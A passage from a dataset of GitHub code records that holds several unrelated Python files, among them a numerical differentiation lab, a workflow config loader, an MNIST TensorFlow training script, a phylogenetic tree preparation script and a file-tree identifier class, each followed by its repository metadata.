#isPrime (n2)\n \n\n #if( isEven (addToNumbers (n1,n2) ) ):\n # print (f'N!: {n1} and N2: {n2} are your lucky numbers!')\n #else:\n # print (f'N!: \"{n1}\" and N2: \"{n2}\"\" are your lucky numbers!')\n\n #if(isPrime (n4 )):\n # print (\"n4 is prime\") \n #else: \n #print (\"n4 is not prime\")","repo_name":"GabrielCB1/StructuredProgramming2A","sub_path":"unit2/fuctionIntro.py","file_name":"fuctionIntro.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20390551732","text":"from math import e\r\n\r\na0 = 1\r\na1 = 2\r\na2 = 3\r\n\r\nx_start = 1\r\nx_step = 1\r\nx_amount = 10\r\n\r\n# def f(x):\r\n# return e**x\r\n\r\ndef f(x):\r\n return a0 * x / (a1 + a2 * x)\r\n\r\ndef create_table(start, step, q):\r\n x_tbl = [start + step * i for i in range(q)]\r\n y_tbl = [f(x) for x in x_tbl]\r\n return x_tbl, y_tbl\r\n\r\ndef left_difference(y, h):\r\n ld = [None]\r\n for i in range(1, len(y)):\r\n ld.append((y[i] - y[i-1]) / h)\r\n return ld\r\n\r\ndef central_difference(y, h):\r\n cd = [None]\r\n for i in range(1, len(y)-1):\r\n cd.append((y[i+1] - y[i-1]) / (2 * h))\r\n cd.append(None)\r\n return cd\r\n\r\ndef edges(y, h):\r\n l = len(y)\r\n ed = [None for y in range(l)]\r\n ed[0] = (-3 * y[0] + 4 * y[1] - y[2]) / (2 * h)\r\n ed[l - 1] = (y[l - 3] - 4 * y[l - 2] + 3 * y[l - 1]) / (2 * h)\r\n return ed\r\n\r\ndef runge_left(y, h):\r\n n = len(y)\r\n p = 1\r\n q = 2\r\n yh = left_difference(y, h)\r\n y2h = [0 if i < 2 else (y[i] - y[i-2]) / (2*h) for i in range(0, n)]\r\n\r\n res = [None, None]\r\n for i in range(2, n):\r\n res.append(yh[i] + (yh[i] - y2h[i]) / (q ** p - 1))\r\n return res\r\n\r\ndef leveling_variables(x, y):\r\n # n = 1 / y\r\n # ли = 1 / x\r\n n = len(x)\r\n res = [0] * n\r\n for i in range(n):\r\n if x[i] != 0:\r\n res[i] = (a1 * (y[i] ** 2)) / ((x[i] ** 2) / a0)\r\n else:\r\n res[i] = None\r\n return res\r\n\r\ndef new_align(x, y):\r\n # n = x / y\r\n # ли = x\r\n n = len(x)\r\n res = [0] * n\r\n\r\n for i in range(n):\r\n if x[i] != 0:\r\n res[i] = (a2 / a0) * (y[i] ** 2 / x[i]) * \\\r\n (((a1 + a2 * x[i]) ** 2) / (a0 * (a1 + a2 * x[i]) - a2 * a0 * x[i]))\r\n else:\r\n res[i] = None\r\n\r\n return res\r\n\r\ndef derivative(x):\r\n return (a0 * (a1 + a2 * x) - a2 * a0 * x) / ((a1 + a2 * x) ** 2)\r\n\r\ndef accurate_derivative(x):\r\n ad = []\r\n for i in range(len(x)):\r\n ad.append(derivative(x[i]))\r\n return ad\r\n\r\ndef print_line(name, table):\r\n print(\"{:<20}\".format(name), end=\"\")\r\n for i in table:\r\n if (i != None):\r\n print(\"{: <15.4f}\".format(i), end=\"\")\r\n else:\r\n print(\"{: <15}\".format(\"None\"), end=\"\")\r\n print()\r\n\r\nx_table, y_table = create_table(x_start, x_step, x_amount)\r\nleft_diff = left_difference(y_table, x_step)\r\ncentral_diff = central_difference(y_table, x_step)\r\nedg = edges(y_table, x_step)\r\nrng = runge_left(y_table, x_step)\r\nalign = leveling_variables(x_table, y_table)\r\nad = accurate_derivative(x_table)\r\nna = new_align(x_table, y_table)\r\n\r\n\r\nstr_ld = []\r\nstr_cd = []\r\nstr_edg = []\r\nstr_rng = []\r\nstr_al = []\r\nfor i in range(len(x_table)):\r\n if left_diff[i] == None:\r\n str_ld.append(\"None\" + \" \" * (20 - len(\"None\")))\r\n else:\r\n str_ld.append(\"{: <15.4f}\".format(left_diff[i]))\r\n\r\n if central_diff[i] == None:\r\n str_cd.append(\"None\" + \" \" * (20 - len(\"None\")))\r\n else:\r\n str_cd.append(\"{: <15.4f}\".format(central_diff[i]))\r\n\r\n if edg[i] == None:\r\n str_edg.append(\"None\" + \" \" * (20 - len(\"None\")))\r\n else:\r\n str_edg.append(\"{: <15.4f}\".format(edg[i]))\r\n\r\n if rng[i] == None:\r\n str_rng.append(\"None\" + \" \" * (20 - len(\"None\")))\r\n else:\r\n str_rng.append(\"{: <15.4f}\".format(rng[i]))\r\n\r\n\r\nprint(\"x \" + \" \" * (20 - len(\"x\")),\r\n \"y \" + \" \" * (20 - len(\"y\")),\r\n \"left diff \" + \" \" * (20 - len(\"left diff\")),\r\n \"central diff \" + \" \" * (20 - len(\"central diff\")),\r\n \"edges \" + \" \" * (20 - len(\"edges\")),\r\n \"Runge \" + \" \" * (20 - len(\"Runge\")),\r\n \"align\" + \" \" * (20 - len(\"Runge\")),\r\n \"accurate\" + \" \" * (20 - len(\"Runge\")),\r\n \"new_align\")\r\n\r\nfor i in range(len(x_table)):\r\n print(\"{: <15.4f}\".format(x_table[i]), \" \" * (20 - len(\"{: <15.4f}\".format(x_table[i]))),\r\n \"{: <15.4f}\".format(y_table[i]), \" \" * (20 - len(\"{: <15.4f}\".format(y_table[i]))),\r\n str_ld[i], \" \" * (20 - len(str_ld[i])),\r\n str_cd[i], \" \" * (20 - len(str_cd[i])),\r\n str_edg[i], \" \" * (20 - len(str_edg[i])),\r\n str_rng[i], \" \" * (20 - len(str_rng[i])),\r\n \"{: <15.4f}\".format(align[i]), \" \" * (20 - len(\"{: <15.4f}\".format(align[i]))),\r\n \"{: <15.4f}\".format(ad[i]), \" \" * (20 - len(\"{: <15.4f}\".format(ad[i]))),\r\n \"{: <15.4f}\".format(na[i]))\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Painted-Black/BMSTU-ComputationalAlgorithms","sub_path":"lab6_ca/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26653240194","text":"from builtins import object\nimport copy\nimport os\nimport re\nimport string\nimport yaml\nfrom ..core import tasks\nfrom ..core.engine.task_graph import TaskGraph\nfrom ..core import utils\n\nclass LoaderException(Exception):\n \"\"\" Exception for generic Task errors\n \"\"\"\n pass\n\nclass Loader(object):\n \"\"\" Responsible for loading the configuration files and \n creating a task graph from a given workflow_name inside \n present inside of the config file.\n\n Note: Duplicate entries found in more than 1 config file are overwritten by config files found later in the list\n\n Args:\n config_file_paths (list): List of file paths to parse for the configured \n work_flows. If not specified, it deafaults to the \"WOLFKROW_CONFIG_SEARCH_PATHS\" \n environment variable.\n \"\"\"\n def __init__(self, config_file_paths=None, replacements=None, sgtk=None, temp_dir=None):\n if config_file_paths is None:\n config_file_paths = os.environ.get('WOLFKROW_CONFIG_SEARCH_PATHS')\n config_file_paths = os.path.expandvars(config_file_paths)\n if config_file_paths:\n config_file_paths = config_file_paths.split(\",\")\n\n if config_file_paths is None:\n raise LoaderException(\"Configuration file not specified and 'WOLFKROW_CONFIG_SEARCH_PATHS' not set.\")\n\n self._config_file_paths = config_file_paths\n self.__config = None\n self.replacements = replacements or {}\n self._sgtk = sgtk\n self.temp_dir = temp_dir\n\n # Ensure that the replacements dictionary is an instance of ReplacementsDict\n if not isinstance(self.replacements, utils.ReplacementsDict):\n self.replacements = utils.ReplacementsDict(self.replacements)\n\n @property\n def config(self):\n if self.__config is None:\n self.__config = self._load_configs(self._config_file_paths)\n \n return self.__config\n\n def _update_config(self, current_dict, new_dict):\n \n # # Generic solution:\n # for key, value in new_dict.items():\n # if key in current_dict:\n # if type(value) != type(current_dict[key]):\n # current_dict[key] = value\n # elif isinstance(dict, value):\n # self._update_config(current_dict[key], value)\n # elif isinstance(list, value) or isinstance(set, value):\n # for item in value:\n # pass\n\n # Custom solution:\n # Top level of the config. IE: task_attribute_defaults, replacements, tasks\n workflow_dict = new_dict.get(\"workflows\")\n if workflow_dict:\n if \"workflows\" not in current_dict:\n current_dict[\"workflows\"] = workflow_dict\n else:\n current_dict[\"workflows\"].update(workflow_dict)\n\n tasks_dict = new_dict.get(\"tasks\")\n if tasks_dict:\n if \"tasks\" not in current_dict:\n current_dict[\"tasks\"] = tasks_dict\n else:\n current_dict[\"tasks\"].update(tasks_dict)\n\n replacements_dict = new_dict.get(\"replacements\")\n if replacements_dict:\n if \"replacements\" not in current_dict:\n current_dict[\"replacements\"] = replacements_dict\n else:\n current_dict[\"replacements\"].update(replacements_dict)\n\n task_attribute_defaults = new_dict.get(\"task_attribute_defaults\")\n if task_attribute_defaults:\n if \"task_attribute_defaults\" not in current_dict:\n current_dict[\"task_attribute_defaults\"] = task_attribute_defaults\n else:\n current_dict[\"task_attribute_defaults\"].update(task_attribute_defaults)\n\n executables = new_dict.get(\"executables\")\n if executables:\n if \"executables\" not in current_dict:\n current_dict[\"executables\"] = executables\n else:\n current_dict[\"executables\"].update(executables)\n\n def _load_configs(self, config_file_paths):\n config = {}\n for config_file in config_file_paths:\n\n # Check that the config file exists before loading it.\n if not os.path.exists(config_file):\n print(\"Warning: Wolfkrow config file {} was not found.\".format(config_file))\n continue\n\n with open(config_file, \"r\") as handle:\n file_contents = handle.read()\n\n config_snippet = yaml.load(file_contents, Loader=yaml.Loader)\n self._update_config(config, config_snippet)\n\n # replace replacements\n # TODO: Should configured replacements overwrite replacements that are passed \n # into the tool, or viceversa?\n self.replacements.update(config.get('replacements', {}))\n\n return config\n\n def tasks_from_task_names_list(self, task_names):\n \"\"\" Parses list of task names, to find in the configuration files. Then \n constructs the corresponding list of tasks.\n\n Note: Task names not found in the configuration file will be ignored.\n\n Args: \n task_names (list): List containing the names of tasks to look up \n in the configuration file.\n Returns:\n List: List of constructed tasks.\n \"\"\"\n\n tasks_lookup = self.config['tasks']\n\n tasks_list = []\n for task_name in task_names:\n\n configured_task_data = tasks_lookup.get(task_name)\n if configured_task_data is None:\n continue\n\n default_task_data = self.get_default_task_data(configured_task_data['task_type'])\n task_data = copy.deepcopy(default_task_data)\n task_data.update(configured_task_data)\n\n task_type = task_data['task_type']\n task_obj = tasks.all_tasks.get(task_type)\n if task_obj is None:\n print(\"Warning: Task type '{task_type}' is undefined. Ignoring...\".format(task_type=task_type))\n\n task_data['name'] = task_name\n task_data['config'] = self.config\n task = task_obj.from_dict(\n task_data, \n replacements=self.replacements, \n config_files=self._config_file_paths, \n temp_dir=self.temp_dir,\n sgtk=self._sgtk\n )\n tasks_list.append(task)\n\n return tasks_list\n\n def get_default_task_data(self, task_name):\n if task_name in self.config.get('task_attribute_defaults', []):\n return self.config['task_attribute_defaults'][task_name]\n return {}\n\n def parse_workflow(self, workflow_name):\n\n task_graph = TaskGraph(\n workflow_name, \n replacements=self.replacements, \n temp_dir=self.temp_dir,\n )\n workflow_tasks = self.config['workflows'].get(workflow_name)\n\n if workflow_tasks is None:\n raise Exception(\"Unable to find workflow '{}'\".format(workflow_name))\n\n for task_name in workflow_tasks:\n\n # Get default task data dictionary\n configured_task_data = self.config['tasks'].get(task_name)\n if not configured_task_data:\n print(\"Warning: Task '{task_name}' is undefined. Ignoring...\".format(task_name=task_name))\n continue\n\n default_task_data = self.get_default_task_data(configured_task_data['task_type'])\n task_data = copy.deepcopy(default_task_data)\n task_data.update(configured_task_data)\n\n task_type = configured_task_data['task_type']\n task_obj = tasks.all_tasks.get(task_type)\n if task_obj is None:\n print(\"Warning: Task type '{task_type}' is undefined. Ignoring...\".format(task_type=task_type))\n continue\n\n task_data['name'] = task_name\n task_data['config'] = self.config\n task = task_obj.from_dict(\n task_data, \n replacements=self.replacements, \n config_files=self._config_file_paths, \n temp_dir=self.temp_dir,\n sgtk=self._sgtk\n )\n task_graph.add_task(task)\n\n return task_graph\n","repo_name":"JakeClark1129/Wolfkrow","sub_path":"src/wolfkrow/builder/workflow_builder.py","file_name":"workflow_builder.py","file_ext":"py","file_size_in_byte":8302,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"24008765680","text":"\"\"\"\nhttps://programmers.co.kr/learn/courses/30/lessons/86051\n\nFind the sum of missing numbers.\n\"\"\"\n\ndef solution(numbers):\n a = list(range(0, 10))\n for x in numbers:\n if x in a:\n a.remove(x)\n return sum(a)\n","repo_name":"dhwangdev/Algorithm","sub_path":"Programmers/Level1/SumMissingNum.py","file_name":"SumMissingNum.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29007159729","text":"from __future__ import print_function\r\n\r\nimport numpy as np\r\n\r\nfrom sklearn.neighbors import NearestNeighbors\r\n\r\n# For reproducibility\r\nnp.random.seed(1000)\r\n\r\nnb_users = 1000\r\nnb_product = 20\r\n\r\nif __name__ == '__main__':\r\n # Create the user dataset\r\n users = np.zeros(shape=(nb_users, 4))\r\n\r\n for i in range(nb_users):\r\n users[i, 0] = np.random.randint(0, 4)\r\n users[i, 1] = np.random.randint(0, 2)\r\n users[i, 2] = np.random.randint(0, 5)\r\n users[i, 2] = np.random.randint(0, 5)\r\n\r\n # Create user-product dataset\r\n user_products = np.random.randint(0, nb_product, size=(nb_users, 5))\r\n\r\n # Fit k-nearest neighbors\r\n nn = NearestNeighbors(n_neighbors=20, radius=2.0)\r\n nn.fit(users)\r\n\r\n # Create a test user\r\n test_user = np.array([2, 0, 3, 2])\r\n\r\n # Determine the neighbors\r\n d, neighbors = nn.kneighbors(test_user.reshape(1, -1))\r\n\r\n print('Neighbors:')\r\n print(neighbors)\r\n\r\n # Determine the suggested products\r\n suggested_products = []\r\n\r\n for n in neighbors:\r\n for products in user_products[n]:\r\n for product in products:\r\n if product != 0 and product not in suggested_products:\r\n suggested_products.append(product)\r\n\r\n print('Suggested products:')\r\n print(suggested_products)\r\n\r\n\r\n\r\n","repo_name":"PacktPublishing/Machine-Learning-Algorithms","sub_path":"Chapter11/1user_based.py","file_name":"1user_based.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"76"} +{"seq_id":"4012446236","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\ninput_node=784 #输入层结点数\noutput_node=10 #输出层结点数\n\nhidden_node=500 #该网络只有一个隐藏层,结点数是500\n\nbatch_size=100 #批量梯度下降的批量尺寸\n\nlearning_rate_base=0.8 #初始化的学习率\nlearning_rate_decay=0.99 #学习率的衰减率\n\nregularization_lambda=0.0001 #正则化系数\ntraining_step=30000 #训练迭代次数\nmoving_average_rate=0.99 #滑动平均衰减率\n\n\n#avg_class:滑动平均类别\ndef inference(input_tensor,avg_class,weights1,biases1,weights2,biases2):\n if avg_class==None:\n layer1=tf.nn.relu(tf.matmul(input_tensor,weights1)+biases1)\n return tf.matmul(layer1,weights2)+biases2 #返回神经网络输出\n else: #使用滑动平均中的参数\n layer1=tf.nn.relu(tf.matmul(input_tensor,avg_class.average(weights1))\n +avg_class.average(biases1))\n return tf.matmul(layer1,avg_class.average(weights2))+avg_class.average(biases2)\n\n\n\ndef train(mnist):\n x=tf.placeholder(tf.float32,[None,input_node],name=\"x_input\")\n y_=tf.placeholder(tf.float16,[None,output_node],name=\"y_input\")\n\n\n weights1=tf.Variable(\n #这是一个截断的产生正太分布的函数,就是说产生正太分布的值如果与均值的差值大于两倍的标准差,那就重新生成\n tf.truncated_normal([input_node,hidden_node],stddev=0.1))\n biases1=tf.Variable(tf.constant(0.1,shape=[1,hidden_node]))\n\n weights2 = tf.Variable(\n # 这是一个截断的产生正太分布的函数,就是说产生正太分布的值如果与均值的差值大于两倍的标准差,那就重新生成\n tf.truncated_normal([hidden_node,output_node], stddev=0.1))\n biases2 = tf.Variable(tf.constant(0.1, shape=[1,output_node ]))\n\n #这里的是不用平均滑动模型\n y=inference(x,None,weights1,biases1,weights2,biases2)\n\n\n #训练轮数,这是不断变化的,但不是要训练的参数\n global_step=tf.Variable(0,trainable=False)\n variable_average=tf.train.ExponentialMovingAverage(moving_average_rate,global_step )\n\n #将所有可训练的参数添加进滑动平均模型(注意:tf.Variable()中默认trainable=True,默认都是可训练的)\n variable_average_op=variable_average.apply(tf.trainable_variables())\n\n #使用平均滑动模型\n average_y=inference(x,variable_average,weights1,biases1,weights2,biases2)\n\n #对预测输出y_每行求最大值,y是[m,output_node],y_-[m,output_node],arg_max行求和后,变成[m,]\n #必须显示地对参数进行赋值,logits=需要softmax的值,labels=是原样本的标签\n #返回变量尺寸为(m,)\n cross_entropy=tf.nn.sparse_softmax_cross_entropy_with_logits(logits=y,labels=tf.arg_max(y_,1))\n cross_entropy_mean=tf.reduce_mean((cross_entropy)) #交叉熵求平均值\n\n\n regularizer=tf.contrib.layers.l2_regularizer(regularization_lambda) #定义正则化\n regularization=regularizer(weights1)+regularizer(weights2) #正则化只需要对选中参数进行正则化,无需对偏置记性呢正则化\n\n loss=cross_entropy_mean+regularization #交叉熵平均值和正则化都是单一的数值型,直接相加\n\n\n #learning_rate=learning_rate_base*learning_rate_decay^(global_step/decay_step),其中\n #decay_step是第三个参数,即mnist.train.num_examples/batch_size\n #还有个参数decay_step表示每decay_step步更新衰减一次学习率\n #global_step是当前的迭代轮数,不断变化的\n learning_rate=tf.train.exponential_decay(\n learning_rate_base, #基础的学习率\n global_step,\n mnist.train.num_examples/batch_size, #decay_step,更新速度,即每优化这么多次更新一次学习率(这个参数是不定的)\n learning_rate_decay,\n )\n\n #这里一定要加上global_step=global_step,保证变量global_step不断变化,然后进一步传进exponential_decay函数中\n #之前GradientDescentOptimizer中的学习率参数都是固定的,像0.01之类,这里则传入了变量,保证学习率不断变化\n #global_step自增,在staircase=True时,每到global_step%decay_step==0时更新一次学习率\n train_step=tf.train.GradientDescentOptimizer(learning_rate).minimize(loss,global_step=global_step)\n\n\n #同时完成反向传播的参数训练模型,得到新的参数,这是又要滑动平均模型,利用新参数值和旧值更新每一个参数的滑动平均值\n #这里使用control_dependencies函数保证一次完成多个操作,其和train_op=tf.group(train_step,variable_average_op)是等价的\n #注意到这里的两个步骤都需要用到global_step,在train_step中保证global_step\n with tf.control_dependencies([train_step,variable_average_op]):\n train_op=tf.no_op(name=\"train\") #tf.no_op啥也不做,纯属凑数\n\n\n #tf.argmax(average_y,1)求每个样本的预测值(尺寸为:[batch_size,1]),这里返回True,False矩阵\n correct_prediction=tf.equal(tf.argmax(average_y,1),tf.argmax(y_,1))\n\n accury=tf.reduce_mean(tf.cast(correct_prediction,tf.float32)) #tf.cast将bool型矩阵转化为float型\n\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n validate_feed={x:mnist.validation.images,\n y_:mnist.validation.labels} #验证集\n\n test_feed = {x: mnist.test.images,\n y_: mnist.test.labels} #测试集\n\n\n for i in range(training_step):\n if i %1000==0: #每1000步打印一次结果\n #验证集的数据不多,可以在整个验证集上进行验证\n validate_accu=sess.run(accury,feed_dict=validate_feed)\n print(\"在%d轮迭代后,验证集的精确度为%g\"%(i,validate_accu)) #%g:根据值的大小采用%e或%f,但最多保留6位有效数字\n\n xs,ys=mnist.train.next_batch(batch_size)\n sess.run(train_op,feed_dict={x:xs,y_:ys})\n\n #全部训练完后,在测试集上看下模型精确度\n test_accu=sess.run(accury,feed_dict=test_feed)\n print(\"在%d轮迭代后,验证集的精确度为%g\" % (training_step, test_accu))\n\n\ndef main(argv=None):\n mnist=input_data.read_data_sets(\"MNIST_data\",one_hot=True)\n train(mnist)\n\n\n#tensorflow提供一个主程序入口,tf.app.run()会调用上面定义的main()函数\nif __name__==\"__main__\":\n tf.app.run()\n\n\n","repo_name":"qzq2514/tensorFlow_selfStudy","sub_path":"fromBooks/5.2.1整合第四章优化方法后的完整神经网络模型.py","file_name":"5.2.1整合第四章优化方法后的完整神经网络模型.py","file_ext":"py","file_size_in_byte":6548,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42635681511","text":"import dendropy\nimport re\nimport os\nimport argparse\nimport sys\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"tree_fp\", help=\"file path to the tree that is to be modified\")\nparser.add_argument(\"-nbs\", help=\"Pass to indicate that the tree doesn't contain bootstraps\", action=\"store_true\")\nparser.add_argument(\"-up_bi\", help=\"Pass to indicate you wish to update bipartitions\", action=\"store_true\")\nparser.add_argument(\"-mid\", help=\"Pass to indicate you wish to midpoint root. Warning using this option will consume large amounts of RAM and time! For 60,000 tips it can cosume > 250 Gb of ram and run for days.\", action=\"store_true\")\nargs = parser.parse_args()\nparser.set_defaults(nbs=False)\nparser.set_defaults(up_bi=False)\nparser.set_defaults(mid=False)\nwd = os.getcwd()\nup_bi = args.up_bi\nnbs = args.nbs\nmid = args.mid\n\n####\n#Prep Tree\n####\n\ntree_fp = args.tree_fp\ntree_type = \"newick\"\n\n#might want to save bootstraps for latter\n#this labels tips as tip taxon (i.e., OTU or species name)\n\ndef PrepTree(tree_fp, tree_type, bs=nbs):\n\t#tree_fp: file path to tree\n\t#tree_type: type of tree to be processed (only newick type is currently supported)\n\t#bs: Boolean, does the tree contain bootstrap values\n\t\n\t#import tree object\n\ttree1 = dendropy.Tree.get_from_path(\"{0}\".format(tree_fp), schema=\"{0}\".format(tree_type))\n\t\n\t#make node bootstrap dictionary \n\tbootstraps = {}\n\tbootstraps['root'] = 0.0\n\tif mid==True:\n\t\tif up_bi==True:\n\t\t\t#print(\"up_bi=T\")\n\t\t\ttree1.reroot_at_midpoint(update_bipartitions=True)\n\t\telse:\n\t\t\t#print(\"up_bi=F\")\n\t\t\ttree1.reroot_at_midpoint(update_bipartitions=False)\n\t\n\tk = 1\n\tif bs==True:\t\n\t\t#name nodes\n\t\tnode_it = tree1.preorder_node_iter()\n\t\tfor i in node_it:\n\t\t\tif i.label == None:\n\t\t\t\tif hasattr(i, 'taxon') and i.taxon != None: # (i.e., a tip)\n\t\t\t\t\ti.label = i.taxon.label\n\t\t\t\telse:\n\t\t\t\t\tif hasattr(i, '_parent_node') and i._parent_node != None: #new\n\t\t\t\t\t\tj = str(k)\n\t\t\t\t\t\tmlabel = \"{0}{1}\".format(\"node\", j)\n\t\t\t\t\t\t#print(mlabel)\n\t\t\t\t\t\tbootstraps[mlabel] = i.label\n\t\t\t\t\t\ti.label = mlabel\n\t\t\t\t\t\t#i.label = \"{0}{1}\".format(\"node\", j) \n\t\t\t\t\t\tk = k + 1\n\t\t\t\t\telse:\n\t\t\t\t\t\ti.label = \"root\"\n\telse:\n\t\t#name nodes\n\t\tnode_it = tree1.preorder_node_iter()\n\t\tfor i in node_it:\n\t\t\tif i.label != None:\n\t\t\t\tif hasattr(i, 'taxon') and i.taxon != None: # (i.e., a tip)\n\t\t\t\t\ti.label = i.taxon.label\n\t\t\t\telse:\n\t\t\t\t\tif hasattr(i, '_parent_node') and i._parent_node != None: #new\n\t\t\t\t\t\tj = str(k)\n\t\t\t\t\t\tmlabel = \"{0}{1}\".format(\"node\", j)\n\t\t\t\t\t\tbootstraps[mlabel] = i.label\n\t\t\t\t\t\ti.label = mlabel\n\t\t\t\t\t\t#i.label = \"{0}{1}\".format(\"node\", j) \n\t\t\t\t\t\tk = k + 1\n\t\t\t\t\telse:\n\t\t\t\t\t\ti.label = \"root\"\n\t\t\telse:\n\t\t\t\tif hasattr(i, 'taxon') and i.taxon != None: # (i.e., a tip)\n\t\t\t\t\ti.label = i.taxon.label\n\t\t\t\telse:\n\t\t\t\t\tif hasattr(i, '_parent_node') and i._parent_node != None: #new\n\t\t\t\t\t\tj = str(k)\n\t\t\t\t\t\tmlabel = \"{0}{1}\".format(\"node\", j)\n\t\t\t\t\t\tbootstraps[mlabel] = i.label\n\t\t\t\t\t\ti.label = mlabel\n\t\t\t\t\t\t#i.label = \"{0}{1}\".format(\"node\", j) \n\t\t\t\t\t\tk = k + 1\n\t\t\t\t\telse:\n\t\t\t\t\t\ti.label = \"root\"\n\t#print(bootstraps)\n\tf = open(\"bootstraps_prep_tree.txt\", 'w')\n\tfor key, value in bootstraps.iteritems():\n\t\tf.write('%s\\t%s\\n' % (key, value))\n\tf.close()\n\treturn tree1\n\n#def PrepTree(tree_fp, tree_type):\n#\t#import tree object\n#\ttree1 = dendropy.Tree.get_from_path(\"{0}\".format(tree_fp), schema=\"{0}\".format(tree_type))\n#\t\n#\t#name nodes\n#\tnode_it = tree1.preorder_node_iter()\n#\tk = 1\n#\tfor i in node_it:\n#\t\tif i.label == None:\n#\t\t\tif hasattr(i, 'taxon') and i.taxon != None: # (i.e., a tip)\n#\t\t\t\ti.label = i.taxon.label\n#\t\t\telse:\n#\t\t\t\tif hasattr(i, '_parent_node') and i._parent_node != None: #new\n#\t\t\t\t\tj = str(k)\n#\t\t\t\t\ti.label = \"{0}{1}\".format(\"node\", j) \n#\t\t\t\t\tk = k + 1\n#\t\t\t\telse:\n#\t\t\t\t\ti.label = \"root\"\n#\treturn tree1\n\n\n\n####\n#Make node ancestor lookup table\n####\n\ndef AncestorLookup(tree):\n\t\"This function makes a dictionary of the ancestors of each node\"\n\tnode_it = tree.preorder_node_iter()\t\n\ttip_ancestors = {}\n\t#make an iterator for each node and append each ancestor to a list(vals)\n\tfor node in node_it:\n\t\tancest_it = node.ancestor_iter(inclusive=False) #get iter for all ancestors\t\n\t\tvals = []\n\t\tfor ancestor in ancest_it: \t\t \n\t\t\tvals.append(str(ancestor.label))\n\t\ttip_ancestors[str(node.label)] = vals\n\treturn tip_ancestors\n\n\n\ntree1 = PrepTree(tree_fp, tree_type) \t\n\nancestor_lookup_dict = AncestorLookup(tree1)\n\ntree1.write_to_path(\n 'new_prepped_tree.tre',\n 'newick')\n\n\n","repo_name":"chrisgaulke/Claatu","sub_path":"bin/prep_tree.py","file_name":"prep_tree.py","file_ext":"py","file_size_in_byte":4397,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"70697300727","text":"#!/usr/bin/env python\nimport re\nimport os\n\n\ndef main():\n path = os.path.join(os.path.dirname(__file__), \"datamodel.py\")\n\n with open(path, \"r\") as f:\n code = f.read()\n\n enum_pattern = re.compile(r\"\\s+[a-zA-Z0-9_-]+\\s=\\s'[a-zA-Z0-9_-]+'\")\n\n new_code = list()\n in_enum = False\n for line in code.split(\"\\n\"):\n # Fix bad artifacts from the generation\n if \"_code__owner_\" in line or \"_write_\" in line or \"_read_\" in line:\n line = f' \"\"\" {line.strip()} \"\"\"'\n\n # Make Enums uppercase\n elif \"(Enum):\" in line:\n in_enum = True\n elif in_enum:\n if not line or line.isspace():\n in_enum = False\n elif enum_pattern.search(line):\n line = line.upper()\n\n new_code.append(line)\n new_code = \"\\n\".join(new_code)\n if not new_code.endswith(\"\\n\"):\n new_code = f\"{new_code}\\n\"\n\n with open(path, \"w\") as f:\n f.write(new_code)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"OnScale/OnScale-Cloud-Client","sub_path":"scripts/tidy.py","file_name":"tidy.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1993286583","text":"from __future__ import annotations\n\nimport logging\nimport re\nfrom pathlib import Path\n\nfrom file_tree import FileTree\n\nfrom .smartPath import SmartPath\n\n\nclass IdentifierEngine:\n \"\"\"Class that can extract an \"identifier\" from a path.\n\n The identifier is a name that is used for comparison between directories and\n should not contain any part that is unique (like a subject number).\n The regular expression in the config files are relied on\n to remove these unique parts of the file/directory name.\n\n Example:\n\n \"sub-15464521_image.png\" and \"sub-25484441_image.png\"\n would both have the same identifier \"_image.png\"\n if using a regular expression that is keeping everything\n after the first \"_\" like \"/_.*$/\".\n\n Attributes\n ----------\n file_expression: string\n The regular expression to filter the identifier from the name of files.\n\n directory_expression: string\n The regular expression to filter the identifier from the name of directories.\n\n logger: logging.Logger\n Logger to save info and debug message.\n Will send the log lines to the appropriate outputs following\n the logger configuration in main.py.\n \"\"\"\n\n def __init__(self, file_expression: str, directory_expression: str, check_file: bool):\n self.file_expression = file_expression\n self.directory_expression = directory_expression\n self.logger = logging.getLogger(f\"file_tree_check.{__name__}\")\n self.logger.info(\"Created an instance of IdentifierEngine\")\n self.check_file = check_file\n\n def get_identifier(\n self, path: str | Path, parent: SmartPath | None, file_tree: FileTree | None\n ) -> str:\n if file_tree is None:\n return self.get_identifier_base(path)\n else:\n return self.get_identifier_tree(path, parent, file_tree)\n\n def get_identifier_base(\n self, path: str | Path, prefix_file_with_parent_directory: bool = False\n ) -> str:\n \"\"\"Extract the identifier from the file/directory.\n\n The identifier should be the repeating part of the name that ties it\n to it's type for comparison\n\n \"sept_6_weekly_report.txt\" -> \"_weekly_report.txt\"\n\n However the details of what precisely to extract and treat as an identifier is handled\n by the regular expressions given on creating the class instance.\n Since the regular expression is used with ``re.search()``, only the first match is kept.\n\n If no match is found, the entire file/directory name is used instead\n since we prefer to have identifier\n that are unique but can still be used in the output vs an empty identifier.\n\n Extraction method with the default regular expression:\n\n .. code-block::\n\n Files = \"_.*$\" ; Keep everything after the first \"_\". to remove the subject number.\n Directories = \"^.*-\" ; Keep everything until the first \"-\".\n\n ; This way, subject directories like \"sub-012012\" are all aggregated\n ; under \"sub-\" while directory names without \"-\" are kept entirely.\n\n Parameters\n ----------\n path: pathlib.Path or string\n The path to the file/directory for which to extract the identifier.\n\n prefix_file_with_parent_directory: bool, default = False\n Whether to include the parent directory as a prefix to the file's identifier.\n This is used to discriminate files that have the same name\n but are located under different subdirectories\n when filename are expected to be found at multiple places\n for each subject/configuration.\n\n Returns\n -------\n identifier: string\n The path's extracted 